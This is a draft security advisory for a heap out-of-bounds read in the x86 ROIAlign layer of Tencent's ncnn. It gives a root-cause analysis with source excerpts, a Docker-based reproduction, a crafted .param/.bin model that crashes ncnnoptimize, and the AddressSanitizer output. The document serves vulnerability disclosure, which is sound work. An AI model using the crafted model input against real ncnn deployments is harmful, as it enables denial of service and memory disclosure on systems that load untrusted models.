All advisories
Draft

ROIAlign Heap Out-Of-Bounds Read

Tencent/ncnn

Affected packages

ncnn other
Affected versions= 5e66f094bf7c597b4569cc014a8be84104748678
Patched versionsNot specified

Description

ROIAlign Heap Out-Of-Bounds Read

Affected commit: 5e66f094bf7c597b4569cc014a8be84104748678
Sink: src/layer/x86/roialign_x86.cpp:304 in ROIAlign_x86::forward
Sanitizer verdict: heap-buffer-overflow

Summary

A crafted model whose ROI coordinate tensor points outside the feature map makes the x86 ROIAlign layer dereference an unclamped interpolation index, reading well past the feature-map allocation and terminating ncnnoptimize. The attacker supplies a .param plus a .bin holding four floats; ncnnoptimize loads them and executes the graph in ModelWriter::shape_inference(), where the ROI values are materialized by MemoryData::forward and passed straight into ROIAlign_x86::forward. The offset read is a linear function of the attacker's ROI width, so its magnitude is attacker-chosen.

Detail

The ROI box [start_w, start_h, end_w, end_h] is read from the second bottom blob with no validation against the feature map. roi_width is derived from those raw values, and bin_size_w = roi_width / pooled_width inherits the same unbounded scale. In the version-0 precompute, the bin start coordinates are clamped to [0, width], but the sample coordinate x is then produced by adding an unclamped bin_size_w term to the clamped start — and of the four resulting corner indices only x1/y1 are bounds-corrected. x0/y0 are stored as-is:

// src/layer/x86/roialign_x86.cpp:160
                for (int bx = 0; bx < bin_grid_w; bx++)
                {
                    float x = wstart + (bx + 0.5f) * bin_size_w / (float)bin_grid_w;
                    int x0 = (int)x;
                    int x1 = x0 + 1;
                    int y0 = (int)y;
                    int y1 = y0 + 1;

                    float a0 = x1 - x;
                    float a1 = x - x0;
                    float b0 = y1 - y;
                    float b1 = y - y0;

                    if (x1 >= width)
                    {
                        x1 = width - 1;
                        a0 = 1.f;
                        a1 = 0.f;
                    }
                    if (y1 >= height)
                    {
                        y1 = height - 1;
                        b0 = 1.f;
                        b1 = 0.f;
                    }
                    // save weights and indices
                    PreCalc<T> pc;
                    pc.pos1 = y0 * width + x0;

// src/layer/x86/roialign_x86.cpp:302
                            PreCalc<float>& pc = pre_calc[pre_calc_index++];
                            // bilinear interpolate at (x,y)
                            sum += pc.w1 * ptr[pc.pos1] + pc.w2 * ptr[pc.pos2] + pc.w3 * ptr[pc.pos3] + pc.w4 * ptr[pc.pos4];

With the PoC's Input data 0 1 data 0=4 1=1 2=1 the feature map is 4x1x1, and the MemoryData blob supplies the ROI [4.0, 0.0, 100.0, 0.0]. ROIAlign pool 2 1 data roi out 0=1 1=1 2=1.000000 3=1 4=0 5=0 sets pooled_width = pooled_height = 1, spatial_scale = 1, sampling_ratio = 1, aligned = 0, version = 0. So roi_width = 100 - 4 = 96 and bin_size_w = 96 / 1 = 96, while wstart is clamped to min(max(4, 0), 4) = 4.

For the single sample, x = 4 + 0.5f * 96 / 1 = 52. x0 becomes 52 and x1 53; only x1 is folded back to width - 1 = 3. Because y1 >= height also fires, b0 = 1.f and a0 = 1.f, so pc.w1 = 1.f and the term pc.w1 * ptr[pc.pos1] with pos1 = 0 * 4 + 52 is fully live. Line 304 therefore reads ptr[52] — 208 bytes into a feature map whose entire backing allocation is 84 bytes — which is the out-of-bounds read ASan reports just below the neighbouring ROI clone.

Reproduce

Build and run (writes the Dockerfile, builds ncnn with ASan, runs the PoC)
mkdir -p ncnn-poc-roialign-heap-out-of-bounds-read && cd ncnn-poc-roialign-heap-out-of-bounds-read

cat > Dockerfile <<'DOCKERFILE'
FROM ubuntu:24.04

RUN apt-get update && apt-get install -y --no-install-recommends \
      git ca-certificates g++ cmake make python3 python3-pip python3-numpy \
      protobuf-compiler libprotobuf-dev \
 && pip3 install --no-cache-dir --break-system-packages onnx protobuf \
 && rm -rf /var/lib/apt/lists/*

RUN git clone --depth 1 https://github.com/Tencent/ncnn.git /ncnn

WORKDIR /ncnn
RUN cmake -S . -B build \
      -DCMAKE_BUILD_TYPE=Debug \
      -DCMAKE_C_FLAGS="-O0 -g -fsanitize=address" \
      -DCMAKE_CXX_FLAGS="-O0 -g -fsanitize=address" \
      -DCMAKE_EXE_LINKER_FLAGS="-fsanitize=address" \
      -DNCNN_BUILD_TOOLS=ON -DNCNN_BUILD_EXAMPLES=ON -DNCNN_BUILD_BENCHMARK=ON \
      -DNCNN_BUILD_TESTS=OFF -DNCNN_VULKAN=OFF -DNCNN_OPENMP=OFF \
 && cmake --build build -j"$(nproc)"

ENV ASAN_OPTIONS=detect_leaks=0
WORKDIR /poc
DOCKERFILE

cat > poc.param <<'EOF'
7767517
3 3
Input data 0 1 data 0=4 1=1 2=1
MemoryData roi 0 1 roi 0=4
ROIAlign pool 2 1 data roi out 0=1 1=1 2=1.0 3=1
EOF

printf '\x00\x00\x80\x40\x00\x00\x00\x00\x00\x00\xc8\x42\x00\x00\x00\x00' > poc.bin

docker build -t ncnn-asan .
docker run --rm --network none -v "$PWD:/poc" ncnn-asan \
  /ncnn/build/tools/ncnnoptimize poc.param poc.bin out.param out.bin 0

AddressSanitizer output:

shape_inference
=================================================================
==1==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x50e0000001d0 at pc 0x557ba3cac092 bp 0x7ffd11cb08a0 sp 0x7ffd11cb0890
READ of size 4 at 0x50e0000001d0 thread T0
    #0 0x557ba3cac091 in ncnn::ROIAlign_x86_avx512::forward(std::vector<ncnn::Mat, std::allocator<ncnn::Mat> > const&, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/build/src/layer/x86/roialign_x86_avx512.cpp:304
    #1 0x557b9e2c570b in ncnn::NetPrivate::do_forward_layer(ncnn::Layer const*, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:856
    #2 0x557b9e2adb7f in ncnn::NetPrivate::forward_layer(int, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:167
    #3 0x557b9e30d9e9 in ncnn::Extractor::extract(int, ncnn::Mat&, int) /ncnn/src/net.cpp:2939
    #4 0x557b9e19f3c0 in ModelWriter::shape_inference() /ncnn/tools/modelwriter.h:435
    #5 0x557b9e21ceee in main /ncnn/tools/ncnnoptimize.cpp:2844
    #6 0x713776c661c9  (/lib/x86_64-linux-gnu/libc.so.6+0x2a1c9) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
    #7 0x713776c6628a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2a28a) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
    #8 0x557b9e19c624 in _start (/ncnn/build/tools/ncnnoptimize+0x2a1624) (BuildId: b1911b1bfb480c5a294bfb9d0e0f7bbde3aaf530)

0x50e0000001d0 is located 48 bytes before 84-byte region [0x50e000000200,0x50e000000254)
allocated by thread T0 here:
    #0 0x7137772dff1d in posix_memalign ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:145
    #1 0x557b9e23168e in fastMalloc /ncnn/src/allocator.h:62
    #2 0x557b9e23168e in ncnn::PoolAllocator::fastMalloc(unsigned long) /ncnn/src/allocator.cpp:159
    #3 0x557b9e26f621 in ncnn::Mat::create(int, unsigned long, int, ncnn::Allocator*) /ncnn/src/mat.cpp:497
    #4 0x557b9e255c14 in ncnn::Mat::clone(ncnn::Allocator*) const /ncnn/src/mat.cpp:79
    #5 0x557ba19a150e in ncnn::MemoryData::forward(std::vector<ncnn::Mat, std::allocator<ncnn::Mat> > const&, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/layer/memorydata.cpp:57
    #6 0x557b9e2c570b in ncnn::NetPrivate::do_forward_layer(ncnn::Layer const*, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:856
    #7 0x557b9e2adb7f in ncnn::NetPrivate::forward_layer(int, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:167
    #8 0x557b9e30d9e9 in ncnn::Extractor::extract(int, ncnn::Mat&, int) /ncnn/src/net.cpp:2939
    #9 0x557b9e19f3c0 in ModelWriter::shape_inference() /ncnn/tools/modelwriter.h:435
    #10 0x557b9e21ceee in main /ncnn/tools/ncnnoptimize.cpp:2844
    #11 0x713776c661c9  (/lib/x86_64-linux-gnu/libc.so.6+0x2a1c9) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
    #12 0x713776c6628a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2a28a) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
    #13 0x557b9e19c624 in _start (/ncnn/build/tools/ncnnoptimize+0x2a1624) (BuildId: b1911b1bfb480c5a294bfb9d0e0f7bbde3aaf530)

SUMMARY: AddressSanitizer: heap-buffer-overflow /ncnn/build/src/layer/x86/roialign_x86_avx512.cpp:304 in ncnn::ROIAlign_x86_avx512::forward(std::vector<ncnn::Mat, std::allocator<ncnn::Mat> > const&, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const

Credit

Zheng Yu @ DepthFirst